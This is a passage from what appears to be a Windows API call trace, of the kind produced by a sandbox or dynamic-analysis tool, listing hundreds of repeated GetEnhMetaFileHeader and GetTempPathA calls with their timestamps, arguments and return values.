GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) 
returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, 
nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: 
lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.897] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.897] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.897] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.897] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.897] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.897] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.897] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.897] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.897] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.897] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.897] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.897] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.897] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.897] 
GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.897] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.897] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.897] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.897] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.897] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.897] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.897] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.917] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.918] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.918] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.918] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.918] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.918] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.918] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.918] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.918] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.918] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.918] 
GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.918] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.918] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.918] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.918] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.918] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.918] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.918] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.918] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.918] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.918] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.918] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.918] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.918] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.918] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.918] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 
0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: 
lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, 
lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: 
nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] 
GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 
0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: 
lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: 